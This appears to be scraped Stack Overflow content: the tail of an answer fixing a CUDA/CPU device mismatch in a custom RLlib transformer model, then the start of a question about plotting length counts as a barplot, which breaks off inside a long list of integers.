"C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1743, in _update_policy_map (RolloutWorker pid=3964) self._build_policy_map( (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1854, in _build_policy_map (RolloutWorker pid=3964) new_policy = create_policy_for_framework( (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\policy.py", line 141, in create_policy_for_framework (RolloutWorker pid=3964) return policy_class(observation_space, action_space, merged_config) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) self._initialize_loss_from_dummy_batch() (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\policy\policy.py", line 1484, in _initialize_loss_from_dummy_batch (RolloutWorker pid=3964) self.loss(self.model, self.dist_class, train_batch) (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 112, in loss (RolloutWorker pid=3964) curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\models\torch\torch_action_dist.py", line 37, in logp (RolloutWorker pid=3964) return self.dist.log_prob(actions) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\torch\distributions\categorical.py", line 143, in log_prob (RolloutWorker pid=3964) return log_pmf.gather(-1, value).squeeze(-1) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument index in method wrapper_CUDA_gather) | To resolve the device mismatch error, you should let RLlib and PyTorch manage device placement automatically. Layers are no longer explicity moved to to(self.device) during initialization Used dynamic device detection of the input self.device = input_dict["obs"].device Only inputs in the forward method and values_out in the value_function are moved to the model's device manually. It's also important to override the forward and value_function methods, as suggested by @Marzi Heifari. Here is the modified version: import torch import torch.nn as nn from ray.rllib.models.torch.torch_modelv2 import TorchModelV2 from ray.rllib.utils.annotations import override, DeveloperAPI from ray.rllib.models.modelv2 import ModelV2 @DeveloperAPI class SimpleTransformer(TorchModelV2, nn.Module): def __init__(self, obs_space, action_space, num_outputs, model_config, name): TorchModelV2.__init__(self, obs_space, action_space, num_outputs, model_config, name) nn.Module.__init__(self) # Configuration custom_config = model_config["custom_model_config"] self.input_dim = 76 self.seq_len = custom_config["seq_len"] self.embed_size = custom_config["embed_size"] self.nheads = custom_config["nhead"] self.nlayers = custom_config["nlayers"] self.dropout = custom_config["dropout"] self.values_out = None self.device = None # Input layer self.input_embed = nn.Linear(self.input_dim, self.embed_size) # Positional encoding self.pos_encoding = nn.Embedding(self.seq_len, self.embed_size) # Transformer self.transformer = nn.TransformerEncoder( nn.TransformerEncoderLayer( d_model=self.embed_size, nhead=self.nheads, dropout=self.dropout, activation='gelu'), num_layers=self.nlayers ) # Policy and value heads self.policy_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), # Add dynamic features (wallet balance, unrealized PnL) nn.ReLU(), nn.Linear(64, num_outputs) # Action space size ) self.value_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), nn.ReLU(), nn.Linear(64, 1) ) @override(ModelV2) def forward(self, input_dict, state, seq_lens): self.device = input_dict["obs"].device x = input_dict["obs"].view(-1, self.seq_len, self.input_dim).to(self.device) dynamic_features = x[:, -1, 2:4].clone() x = self.input_embed(x) position = torch.arange(0, self.seq_len, device=self.device).unsqueeze(0).expand(x.size(0), -1) x = x + self.pos_encoding(position) transformer_out = self.transformer(x) last_out = transformer_out[:, -1, :] combined = torch.cat((last_out, dynamic_features), dim=1) logits = self.policy_head(combined) self.values_out = self.value_head(combined).squeeze(1) return logits, state @override(ModelV2) def value_function(self): return self.values_out.to(self.device) | 2 | 0 |
79,572,697 | 2025-4-14 | https://stackoverflow.com/questions/79572697/produce-nice-barplots-with-python-in-pycharm | I'm working on a very basic barplot in Python where I need to plot a series of length occurrences showcasing how many times a specific one appears. I'm storing everything in an array, but when I attempt to plot I either get the y-scale wrong, or on the x-axis all the instances when instead they should be “added” on top of each other towards the total count. Below, the code I tested and an ideal output I wish to achieve which I plotted with R: print(l) [408, 321, 522, 942, 462, 564, 765, 747, 465, 957, 993, 1056, 690, 1554, 1209, 246, 462, 3705, 1554, 507, 681, 1173, 408, 330, 1317, 240, 576, 2301, 1911, 1677, 1014, 756, 918, 864, 528, 882, 1131, 1440, 1167, 1146, 1002, 906, 1056, 1881, 396, 1278, 501, 1110, 303, 1176, 699, 747, 1971, 3318, 1875, 450, 354, 1218, 378, 303, 777, 915, 5481, 576, 1920, 2022, 1662, 519, 936, 423, 1149, 600, 1896, 648, 2238, 1419, 423, 552, 1299, 1071, 963, 471, 408, 729, 1896, 1068, 1254, 1179, 1188, 645, 978, 903, 1191, 1119, 747, 1005, 273, 1191, 519, 930, 1053, 2157, 933, 888, 591, 1287, 457, 294, 291, 669, 270, 556, 444, 483, 438, 452, 659, 372, 480, 464, 477, 256, 350, 357, 524, 477, 218, 192, 216, 587, 473, 525, 657, 241, 719, 383, 459, 855, 417, 283, 408, 678, 681, 1254, 879, 250, 857, 706, 456, 567, 190, 887, 287, 240, 960, 587, 361, 816, 297, 290, 253, 335, 609, 507, 294, 1475, 464, 780, 552, 555, 1605, 1127, 382, 579, 645, 273, 241, 552, 344, 890, 1346, 1067, 764, 431, 796, 569, 1386, 413, 401, 407, 252, 375, 378, 339, 457, 1779, 243, 701, 552, 708, 174, 300, 257, 378, 777, 729, 969, 603, 378, 436, 348, 399, 1662, 1511, 799, 715, 1400, 399, 516, 399, 355, 1291, 1286, 657, 374, 492, 334, 295, 210, 270, 858, 1487, 1020, 1641, 417, 396, 303, 553, 492, 1097, 612, 441, 654, 611, 532, 474, 864, 377, 465, 435, 1003, 608, 486, 748, 351, 245, 545, 627, 303, 457, 419, 449, 843, 312, 398, 704, 315, 330, 1054, 259, 507, 372, 468, 345, 1303, 408, 1031, 471, 653, 925, 397, 231, 684, 449, 336, 344, 619, 917, 417, 516, 359, 550, 222, 789, 608, 659, 853, 360, 657, 372, 305, 353, 650, 564, 547, 969, 505, 230, 953, 769, 307, 516, 408, 342, 267, 570, 572, 348, 1005, 981, 1586, 1302, 369, 1290, 1458, 572, 1122, 363, 879, 651, 466, 1203, 485, 440, 473, 810, 1320, 461, 455, 258, 660, 297, 285, 424, 273, 378, 432, 293, 410, 327, 483, 477, 551, 894, 638, 538, 678, 303, 478, 1046, 995, 360, 252, 480, 490, 475, 394, 1185, 357, 361, 387, 489, 450, 788, 366, 340, 829, 469, 404, 593, 498, 840, 601, 235, 452, 395, 504, 299, 662, 357, 686, 683, 248, 574, 1108, 587, 483, 1481, 1297, 1334, 579, 182, 456, 1335, 513, 967, 918, 607, 564, 727, 913, 743, 312, 480, 659, 939, 705, 1001, 553, 339, 286, 452, 744, 519, 521, 491, 565, 522, 377, 861, 812, 523, 332, 800, 1015, 1000, 513, 990, 1003, 733, 542, 940, 399, 399, 612, 1361, 399, 399, 318, 319, 510, 504, 841, 1529, 506, 1881, 500, 358, 240, 1261, 354, 519, 779, 656, 311, 635, 527, 759, 333, 648, 770, 330, 584, 453, 632, 513, 998, 343, 696, 1286, 391, 374, 893, 375, 426, 658, 455, 518, 466, 417, 614, 285, 480, 845, 344, 534, 572, 1727, 1085, 480, 468, 192, 348, 578, 2433, 390, 1031, 1129, 626, 735, 963, 439, 272, 806, 743, 560, 250, 679, 459, 207, 905, 616, 404, 489, 582, 340, 435, 1632, 417, 221, 279, 462, 357, 288, 248, 981, 1015, 935, 678, 279, 348, 470, 958, 867, 352, 735, 293, 911, 460, 767, 386, 531, 411, 192, 742, 373, 1454, 970, 285, 468, 273, 1527, 612, 983, 552, 998, 553, 812, 983, 403, 1706, 781, 183, 405, 891, 647, 1022, 946, 476, 270, 471, 888, 435, 354, 563, 526, 877, 1170, 351, 863, 1503, 562, 1174, 345, 385, 275, 374, 171, 474, 408, 1640, 345, 462, 722, 1645, 504, 840, 459, 783, 501, 473, 609, 684, 543, 353, 788, 684, 734, 242, 751, 478, 471, 365, 293, 380, 486, 617, 786, 436, 632, 624, 386, 925, 469, 405, 2406, 462, 435, 251, 1118, 349, 779, 343, 458, 264, 243, 935, 535, 576, 480, 406, 606, 495, 396, 456, 798, 404, 285, 375, 922, 1136, 330, 339, 559, 998, 239, 587, 468, 1237, 1722, 699, 436, 377, 306, 326, 1076, 385, 537, 315, 342, 386, 400, 340, 202, 266, 455, 435, 259, 317, 456, 249, 452, 1345, 699, 456, 456, 453, 275, 315, 693, 354, 475, 780, 415, 956, 554, 258, 418, 996, 552, 511, 1404, 469, 262, 398, 242, 350, 538, 379, 300, 460, 373, 276, 258, 740, 609, 753, 357, 495, 532, 551, 234, 633, 480, 312, 898, 350, 705, 265, 345, 334, 334, 582, 583, 582, 478, 465, 480, 408, 870, 624, 1107, 303, 384, 1165, 1456, 878, 297, 301, 276, 372, 551, 799, 496, 204, 552, 791, 330, 359, 480, 468, 414, 1102, 876, 1112, 850, 536, 500, 374, 825, 476, 499, 275, 345, 616, 360, 609, 310, 260, 376, 283, 390, 1529, 1310, 207, 1039, 661, 570, 1292, 914, 843, 658, 302, 1119, 609, 225, 317, 1091, 225, 403, 544, 495, 912, 744, 473, 985, 342, 630, 298, 392, 297, 933, 888, 666, 1023, 346, 310, 1134, 840, 1277, 387, 463, 435, 610, 492, 1107, 582, 582, 582, 1307, 647, 1280, 555, 645, 267, 952, 588, 348, 287, 507, 410, 737, 731, 354, 2192, 309, 388, 692, 389, 742, 766, 1228, 1640, 237, 495, 351, 285, 2443, 963, 296, 420, 482, 246, 553, 621, 405, 597, 459, 310, 300, 450, 471, 291, 610, 723, 380, 1439, 312, 900, 275, 396, 342, 309, 549, 355, 474, 417, 372, 384, 291, 987, 629, 407, 655, 357, 473, 348, 459, 599, 474, 430, 620, 584, 546, 435, 242, 1167, 627, 378, 945, 349, 255, 216, 530, 516, 606, 449, 1490, 401, 1070, 899, 452, 1304, 451, 723, 354, 229, 629, 639, 501, 465, 344, 1895, 288, 341, 2377, 542, 453, 291, 645, 494, 471, 612, 1294, 713, 1291, 467, 734, 300, 1432, 320, 753, 609, 1051, 231, 875, 704, 438, 742, 504, 1334, 738, 342, 435, 1133, 1229, 436, 310, 494, 273, 1228, 626, 470, 235, 1264, 465, 450, 350, 647, 541, 256, 231, 435, 485, 224, 555, 395, 300, 969, 237, 1717, 416, 538, 371, 326, 360, 1194, 397, 519, 645, 324, 465, 402, 477, 527, 831, 1179, 366, 889, 941, 374, 775, 581, 392, 1188, 797, 480, 418, 733, 857, 332, 255, 2847, 917, 478, 585, 591, 480, 1293, 273, 375, 489, 727, 316, 1451, 975, 762, 528, 408, 1104, 375, 265, 609, 317, 879, 542, 332, 462, 492, 284, 282, 394, 483, 493, 778, 291, 443, 350, 491, 374, 369, 862, 245, 269, 640, 282, 606, 393, 307, 488, 276, 611, 471, 1806, 1296, 336, 244, 1105, 444, 375, 1214, 294, 455, 353, 605, 669, 354, 692, 345, 643, 289, 460, 771, 351, 1635, 331, 465, 703, 352, 396, 269, 1142, 353, 552, 2790, 611, 606, 731, 447, 485, 420, 283, 744, 1265, 381, 1146, 589, 477, 309, 669, 389, 435, 558, 445, 1448, 333, 762, 1222, 779, 519, 465, 317, 375, 480, 371, 787, 305, 1276, 408, 304, 246, 791, 341, 330, 536, 278, 383, 417, 351, 323, 1068, 507, 741, 678, 613, 823, 1748, 411, 676, 287, 486, 433, 506, 194, 444, 860, 1212, 1005, 321, 462, 1158, 223, 625, 294, 294, 1598, 205, 764, 2649, 1226, 479, 543, 321, 1143, 648, 2409, 291, 1095, 651, 405, 294, 728, 267, 805, 294, 1010, 405, 368, 442, 363, 3117, 296, 466, 1621, 509, 219, 692, 453, 749, 828, 950, 683, 574, 438, 396, 461, 740, 350, 408, 1636, 746, 821, 912, 482, 532, 397, 582, 537, 761, 348, 354, 356, 978, 348, 441, 464, 1206, 576, 355, 446, 577, 1186, 396, 980, 213, 498, 597, 335, 419, 351, 617, 226, 609, 206, 762, 596, 999, 589, 585, 477, 558, 206, 806, 405, 356, 742, 881, 426, 434, 735, 494, 611, 308, 453, 426, 664, 384, 335, 612, 286, 463, 363, 460, 327, 1007, 1285, 1021, 464, 662, 1266, 1275, 205, 581, 351, 409, 387, 406, 296, 353, 447, 472, 667, 572, 682, 460, 941, 382, 477, 819, 340, 477, 716, 461, 302, 348, 291, 459, 567, 625, 216, 713, 394, 462, 620, 486, 1049, 1027, 761, 534, 348, 346, 313, 551, 522, 612, 303, 186, 288, 1054, 481, 1263, 530, 603, 491, 297, 1989, 598, 545, 291, 568, 201, 538, 267, 894, 2037, 456, 291, 367, 338, 782, 435, 570, 245, 371, 341, 478, 511, 348, 1019, 1315, 1007, 469, 711, 848, 1810, 807, 455, 607, 435, 270, 489, 408, 574, 444, 438, 495, 474, 675, 1024, 610, 464, 477, 549, 305, 366, 306, 222, 158, 893, 312, 348, 259, 261, 336, 495, 560, 452, 273, 357, 455, 195, 506, 1403, 345, 347, 462, 957, 224, 798, 487, 372, 798, 420, 316, 400, 399, 878, 618, 371, 369, 336, 474, 350, 1081, 1012, 649, 480, 430, 570, 341, 759, 456, 237, 466, 531, 455, 846, 280, 767, 758, 624, 724, 582, 1924, 270, 570, 1800, 530, 826, 1478, 345, 624, 498, 231, 686, 592, 1671, 413, 582, 302, 504, 666, 727, 613, 857, 270, 446, 483, 1781, 1308, 358, 1393, 453, 672, 264, 412, 281, 378, 476, 562, 792, 342, 495, 342, 392, 269, 1495, 668, 490, 272, 266, 270, 1080, 401, 405, 395, 588, 306, 604, 482, 301, 1439, 1605, 1833, 441, 1287, 1093, 1564, 1093, 624, 1925, 1287, 894, 428, 547, 1924, 1455, 938, 1369, 1794, 404, 605, 570, 447, 1171, 268, 626, 318, 406, 1471, 1069, 792, 657, 482, 420, 1121, 844, 522, 1560, 734, 1318, 723, 1335, 830, 825, 287, 440, 895, 323, 782, 479, 1397, 860, 297, 1002, 570, 603, 576, 269, 466, 758, 509, 552, 462, 493, 477, 431, 351, 757, 438, 1765, 1486, 480, 907, 620, 600, 438, 576, 576, 801, 515, 862, 337, 532, 385, 953, 719, 1223, 468, 486, 445, 231, 610, 474, 311, 738, 868, 453, 558, 409, 305, 827, 308, 614, 519, 380, 763, 472, 313, 447, 960, 741, 444, 520, 543, 531, 450, 413, 305, 492, 868, 207, 1285, 492, 802, 435, 303, 723, 705, 308, 417, 353, 347, 737, 380, 477, 343, 345, 409, 408, 276, 193, 270, 845, 792, 443, 1111, 256, 800, 549, 315, 274, 426, 470, 359, 473, 271, 576, 1293, 342, 761, 577, 671, 340, 276, 394, 467, 387, 336, 920, 350, 1400, 195, 336, 1282, 282, 773, 757, 566, 396, 880, 494, 661, 953, 480, 314, 468, 468, 339, 550, 1075, 334, 318, 365, 567, 286, 1560, 207, 1344, 584, 333, 387, 1164, 1074, 1324, 1080, 405, 264, 300, 582, 342, 427, 514, 576, 993, 208, 669, 993, 439, 219, 742, 890, 966, 520, 337, 488, 438, 561, 319, 476, 300, 465, 1056, 1044, 216, 198, 267, 327, 527, 746, 447, 288, 923, 268, 300, 262, 1015, 468, 289, 341, 345, 483, 482, 548, 255, 441, 229, 435, 453, 264, 369, 403, 333, 461, 446, 221, 405, 848, 616, 396, 405, 495, 476, 315, 351, 438, 495, 482, 456, 322, 666, 1031, 633, 306, 880, 2683, 774, 494, 993, 430, 1284, 1118, 1030, 219, 384, 2249, 301, 195, 689, 251, 302, 474, 732, 790, 435, 436, 270, 198, 435, 583, 800, 310, 576, 280, 363, 651, 743, 855, 485, 673, 1014, 345, 407, 351, 3668, 355, 396, 415, 361, 229, 269, 1094, 435, 327, 587, 299, 362, 375, 414, 440, 637, 732, 845, 432, 360, 572, 198, 934, 1480, 948, 976, 899, 372, 459, 997, 165, 734, 455, 479, 480, 514, 504, 446, 504, 1620, 552, 1118, 485, 509, 892, 1025, 546, 777, 455, 445, 985, 474, 864, 302, 712, 283, 307, 432, 1075, 478, 732, 685, 375, 507, 1209, 1097, 2480, 477, 343, 432, 496, 465, 457, 768, 561, 660, 915, 661, 255, 217, 960, 265, 526, 672, 798, 357, 1692, 622, 465, 612, 228, 1086, 444, 261, 345, 238, 706, 240, 444, 288, 632, 528, 318, 401, 378, 192, 461, 528, 393, 486, 409, 831, 1019, 745, 222, 216, 465, 839, 1399, 523, 461, 457, 388, 438, 1062, 351, 553, 814, 345, 494, 643, 307, 306, 252, 569, 534, 557, 372, 374, 344, 696, 351, 582, 903, 375, 432, 303, 743, 617, 459, 492, 495, 999, 284, 538, 291, 748, 742, 739, 449, 212, 261, 579, 1311, 1178, 330, 458, 276, 563, 467, 565, 578, 227, 178, 959, 642, 475, 1242, 325, 365, 360, 314, 523, 201, 569, 571, 351, 319, 298, 468, 1154, 351, 599, 574, 947, 480, 415, 770, 459, 263, 285, 281, 465, 1429, 498, 199, 345, 639, 261, 489, 314, 291, 692, 318, 351, 399, 275, 540, 542, 914, 492, 872, 231, 1324, 373, 270, 302, 479, 285, 381, 270, 410, 1366, 242, 698, 1044, 513, 1004, 951, 702, 796, 291, 282, 444, 734, 1669, 500, 350, 319, 1092, 239, 434, 266, 297, 323, 407, 252, 879, 893, 267, 222, 326, 311, 288, 680, 568, 477, 877, 408, 968, 888, 1497, 1312, 336, 279, 459, 876, 294, 324, 324, 801, 383, 225, 449, 609, 384, 738, 951, 312, 550, 810, 765, 377, 297, 179, 213, 320, 489, 797, 1637, 558, 616, 1907, 517, 556, 773, 669, 426, 432, 956, 336, 757, 353, 420, 462, 797, 475, 1124, 356, 579, 212, 472, 361, 408, 390, 470, 527, 637, 422, 474, 622, 533, 728, 985, 537, 606, 340, 754, 479, 851, 960, 453, 607, 518, 639, 495, 341, 411, 441, 609, 792, 287, 498, 458, 260, 195, 411, 1646, 375, 665, 243, 356, 426, 207, 362, 452, 339, 666, 852, 476, 312, 375, 284, 437, 673, 507, 332, 380, 747, 734, 431, 268, 243, 315, 221, 767, 894, 225, 362, 358, 919, 294, 396, 449, 179, 549, 435, 528, 479, 300, 436, 380, 523, 550, 255, 1043, 645, 402, 203, 479, 679, 478, 654, 769, 471, 418, 617, 342, 674, 993, 321, 615, 150, 204, 1033, 606, 759, 604, 828, 307, 273, 558, 234, 408, 548, 1238, 914, 978, 930, 269, 287, 390, 474, 248, 234, 714, 603, 471, 236, 383, 732, 356, 269, 461, 358, 197, 506, 465, 274, 618, 1309, 1638, 1154, 2222, 930, 1395, 1387, 765, 899, 291, 354, 872, 355, 273, 664, 426, 360, 683, 627, 609, 1230, 861, 6609, 549, 444, 240, 461, 234, 495, 571, 957, 342, 212, 1519, 396, 358, 1272, 1492, 615, 414, 472, 332, 335, 1060, 721, 477, 556, 654, 699, 654, 393, 921, 1651, 504, 710, 1083, 755, 246, 476, 270, 330, 618, 805, 571, 495, 391, 498, 1390, 444, 207, 615, 349, 548, 467, 301, 216, 473, 724, 744, 504, 673, 525, 670, 669, 1221, 288, 884, 462, 565, 434, 522, 455, 639, 1221, 301, 1223, 1029, 991, 491, 465, 434, 472, 392, 821, 719, 543, 246, 818, 913, 402, 535, 492, 492, 491, 534, 968, 886, 316, 541, 494, 409, 246, 435, 442, 989, 473, 790, 624, 398, 469, 273, 735, 328, 601, 627, 356, 344, 410, 1261, 495, 506, 518, 388, 624, 687, 237, 972, 476, 527, 1518, 479, 633, 675, 374, 573, 444, 357, 239, 581, 799, 308, 522, 758, 272, 171, 276, 879, 275, 455, 648, 252, 474, 303, 510, 348, 590, 1086, 504, 928, 530, 495, 1587, 239, 608, 326, 585, 373, 496, 482, 1158, 885, 333, 459, 370, 455, 893, 307, 468, 290, 604, 1198, 306, 1110, 922, 705, 418, 1441, 613, 401, 546, 354, 465, 1205, 328, 703, 570, 428, 232, 1292, 415, 1007, 1285, 1019, 968, 245, 606, 1284, 798, 1588, 1547, 606, 326, 506, 228, 1071, 429, 485, 1508, 625, 294, 330, 405, 343, 192, 452, 359, 222, 1282, 521, 461, 403, 735, 297, 1288, 606, 382, 339, 650, 918, 309, 724, 479, 439, 289, 364, 1683, 226, 1139, 372, 495, 741, 923, 464, 629, 266, 1186, 891, 429, 271, 224, 723, 408, 687, 763, 421, 398, 599, 918, 272, 610, 932, 247, 306, 1224, 594, 531, 349, 332, 405, 486, 406, 752, 441, 386, 368, 663, 350, 480, 1067, 368, 816, 468, 615, 976, 339, 332, 903, 357, 961, 970, 657, 942, 662, 400, 304, 858, 332, 238, 231, 327, 475, 1499, 432, 585, 392, 412, 594, 263, 381, 432, 1320, 269, 439, 465, 321, 718, 1059, 408, 1308, 392, 856, 1255, 536, 339, 2192, 455, 1390, 715, 522, 980, 432, 320, 2766, 531, 697, 378, 717, 246, 590, 731, 976, 733, 177, 345, 588, 348, 1187, 318, 724, 705, 1146, 284, 610, 354, 298, 331, 693, 1210, 1470, 540, 612, 419, 1039, 574, 739, 1213, 1332, 296, 292, 493, 1046, 567, 662, 708, 233, 1123, 933, 624, 159, 492, 210, 473, 1153, 1489, 974, 669, 1281, 737, 729, 545, 532, 357, 565, 844, 939, 468, 878, 772, 773, 355, 469, 2315, 171, 654, 1063, 432, 1938, 270, 866, 716, 1022, 323, 330, 226, 285, 300, 896, 300, 659, 246, 1493, 231, 906, 294, 465, 533, 525, 363, 524, 891, 788, 270, 240, 723, 734, 2027, 474, 1327, 547, 589, 240, 465, 339, 614, 492, 486, 398, 639, 345, 974, 156, 664, 1544, 1367, 776, 610, 465, 519, 478, 1524, 640, 1431, 1288, 419, 189, 275, 651, 852, 939, 672, 316, 489, 456, 360, 921, 939, 446, 366, 384, 366, 266, 332, 492, 1479, 825, 460, 351, 549, 475, 740, 313, 357, 556, 618, 1039, 411, 234, 378, 567, 269, 990, 270, 573, 629, 996, 1107, 393, 480, 624, 583, 485, 1770, 323, 374, 484, 1128, 609, 379, 1426, 551, 1182, 680, 607, 472, 467, 1312, 468, 342, 473, 1279, 832, 408, 802, 764, 290, 668, 440, 1085, 492, 1523, 189, 329, 1334, 403, 285, 427, 653, 346, 1385, 197, 1281, 465, 468, 414, 981, 473, 879, 552, 246, 522, 610, 609, 255, 915, 2142, 624, 236, 892, 480, 944, 847, 674, 739, 275, 1139, 291, 815, 357, 387, 613, 160, 341, 630, 794, 3061, 552, 167, 447, 300, 471, 1182, 867, 424, 1104, 417, 648, 708, 700, 405, 399, 231, 246, 1588, 766, 1127, 611, 892, 604, 995, 657, 2170, 336, 492, 273, 874, 303, 487, 500, 967, 1380, 345, 300, 1863, 408, 446, 1269, 351, 1448, 570, 336, 487, 270, 270, 804, 833, 1384, 1235, 404, 285, 1499, 708, 834, 584, 309, 492, 528, 762, 624, 380, 323, 916, 403, 384, 409, 530, 241, 724, 1950, 645, 301, 386, 704, 708, 1389, 588, 693, 484, 469, 299, 467, 1119, 696, 610, 824, 231, 531, 321, 663, 177, 635, 573, 268, 711, 892, 513, 707, 872, 619, 576, 476, 506, 285, 594, 495, 564, 399, 387, 638, 536, 594, 772, 955, 672, 312, 305, 627, 774, 575, 1178, 1647, 390, 879, 563, 931, 464, 440, 515, 201, 499, 703, 738, 1372, 794, 712, 503, 1034, 618, 753, 225, 736, 688, 395, 345, 531, 695, 467, 1009, 789, 1659, 532, 913, 261, 359, 611, 660, 480, 555, 551, 849, 743, 1224, 841, 442, 408, 372, 625, 437, 825, 297, 375, 647, 304, 992, 722, 451, 684, 155, 780, 543, 340, 477, 1659, 2790, 480, 445, 457, 968, 360, 306, 676, 498, 603, 318, 724, 600, 265, 718, 381, 343, 776, 600, 600, 600, 600, 600, 600, 600, 597, 600, 597, 584, 255, 1539, 672, 1726, 179, 589, 326, 629, 626, 789, 440, 954, 537, 262, 3015, 405, 374, 381, 743, 272, 479, 640, 293, 359, 412, 959, 550, 1088, 492, 615, 279, 480, 864, 369, 491, 467, 343, 537, 723, 254, 567, 1049, 1313, 591, 311, 477, 1617, 744, 251, 299, 159, 461, 464, 1042, 668, 301, 771, 533, 280, 713, 544, 608, 493, 644, 344, 456, 560, 1110, 307, 290, 1069, 606, 717, 1167, 653, 356, 495, 1012, 432, 297, 1618, 405, 449, 405, 573, 565, 962, 364, 369, 910, 223, 245, 398, 495, 577, 616, 468, 620, 316, 230, 633, 334, 808, 543, 744, 935, 1004, 863, 615, 592, 429, 333, 204, 484, 287, 642, 930, 866, 997, 299, 290, 520, 342, 959, 588, 851, 629, 522, 537, 569, 336, 391, 462, 824, 474, 959, 760, 353, 348, 462, 1420, 1386, 1275, 548, 408, 600, 600, 600, 600, 402, 242, 1391, 1215, 573, 470, 1168, 476, 1712, 376, 868, 495, 379, 300, 1359, 1053, 662, 465, 526, 427, 543, 667, 322, 778, 1327, 435, 360, 507, 1079, 1201, 477, 403, 261, 673, 499, 580, 446, 908, 1490, 552, 269, 576, 616, 933, 961, 384, 236, 479, 255, 495, 483, 602, 354, 435, 650, 826, 455, 704, 246, 636, 1267, 1201, 282, 567, 432, 2289, 666, 549, 162, 510, 748, 297, 372, 270, 699, 227, 412, 344, 470, 491, 1370, 403, 456, 246, 317, 335, 1379, 952, 456, 416, 519, 312, 656, 338, 863, 688, 340, 854, 666, 697, 742, 967, 587, 192, 462, 490, 337, 890, 1539, 244, 229, 536, 280, 264, 414, 438, 1311, 300, 884, 695, 1509, 798, 612, 611, 414, 533, 678, 426, 274, 466, 883, 864, 603, 873, 1398, 477, 495, 528, 767, 613, 304, 1419, 832, 488, 489, 1290, 648, 266, 1200, 957, 407, 507, 703, 715, 495, 305, 389, 949, 492, 1155, 693, 333, 464, 331, 769, 660, 1115, 403, 483, 899, 279, 371, 354, 361, 444, 552, 286, 248, 265, 662, 393, 2433, 766, 752, 326, 692, 1185, 1170, 678, 728, 432, 656, 1190, 510, 878, 366, 434, 297, 680, 735, 533, 935, 774, 692, 1162, 687, 540, 1417, 464, 339, 779, 471, 566, 281, 384, 271, 760, 698, 357, 513, 888, 475, 515, 216, 864, 303, 630, 425, 299, 562, 522, 1155, 457, 489, 812, 719, 405, 1313, 735, 255, 275, 384, 274, 1007, 289, 457, 1239, 368, 1148, 581, 351, 488, 712, 1097, 639, 478, 481, 630, 479, 493, 740, 1239, 366, 380, 1234, 358, 483, 824, 593, 994, 318, 465, 797, 715, 766, 333, 615, 693, 495, 366, 366, 420, 400, 381, 879, 431, 404, 645, 405, 451, 360, 263, 522, 315, 294, 610, 382, 1304, 417, 655, 824, 829, 463, 798, 453, 495, 264, 1122, 1476, 469, 285, 1098, 838, 430, 293, 418, 225, 260, 1004, 346, 552, 1383, 708, 1218, 348, 738, 358, 342, 303, 993, 597, 1048, 571, 448, 752, 581, 475, 803, 1209, 863, 385, 737, 435, 651, 982, 1286, 1175, 1172, 329, 582, 485, 1280, 338, 520, 308, 407, 330, 392, 420, 1595, 951, 454, 348, 482, 305, 1004, 498, 243, 768, 470, 1773, 770, 266, 543, 456, 622, 516, 773, 661, 368, 395, 364, 444, 506, 606, 1077, 429, 557, 478, 311, 1318, 2398, 724, 402, 435, 345, 511, 1004, 1119, 293, 365, 715, 360, 191, 955, 480, 954, 347, 421, 495, 416, 432, 457, 583, 484, 894, 918, 705, 471, 378, 499, 889, 1277, 624, 307, 1274, 405, 299, 430, 1449, 879, 374, 1078, 1326, 860, 586, 192, 1356, 815, 595, 817, 484, 476, 373, 416, 744, 526, 352, 207, 460, 542, 334, 332, 499, 702, 258, 951, 771, 1199, 372, 425, 459, 448, 542, 343, 270, 791, 969, 287, 316, 398, 460, 357, 270, 811, 741, 474, 374, 582, 869, 404, 409, 421, 581, 797, 1197, 225, 408, 366, 338, 1098, 474, 609, 1318, 568, 864, 813, 1560, 543, 312, 321, 305, 1125, 420, 771, 400, 302, 251, 476, 321, 1140, 405, 764, 390, 275, 317, 697, 447, 573, 348, 1829, 1062, 459, 361, 861, 1385, 1797, 1182, 477, 445, 552, 537, 359, 684, 1079, 342, 260, 519, 408, 827, 823, 456, 529, 1155, 291, 900, 730, 445, 564, 399, 1149, 488, 192, 658, 1520, 1024, 861, 1007, 455, 808, 750, 489, 411, 486, 382, 566, 354, 366, 542, 542, 413, 1056, 1056, 486, 793, 431, 790, 416, 610, 504, 491, 1393, 611, 392, 531, 588, 905, 820, 955, 1148, 782, 1104, 314, 744, 729, 428, 256, 680, 337, 372, 622, 289, 367, 676, 327, 465, 1311, 1101, 370, 401, 729, 302, 587, 378, 420, 1124, 450, 1387, 387, 240, 1232, 352, 589, 669, 1181, 405, 656, 1185, 946, 610, 1696, 610, 294, 537, 381, 646, 393, 325, 274, 300, 449, 669, 342, 551, 1329, 473, 398, 1222, 881, 651, 234, 467, 682, 457, 905, 292, 330, 726, 291, 312, 438, 393, 477, 1494, 188, 369, 491, 394, 539, 674, 569, 531, 342, 770, 347, 279, 510, 360, 346, 959, 661, 315, 406, 813, 527, 517, 568, 373, 417, 429, 330, 572, 638, 210, 266, 894, 746, 344, 459, 772, 261, 339, 876, 575, 317, 1534, 707, 1141, 405, 1104, 282, 954, 441, 573, 656, 255, 444, 610, 1696, 207, 610, 610, 648, 548, 948, 641, 344, 505, 397, 388, 1859, 488, 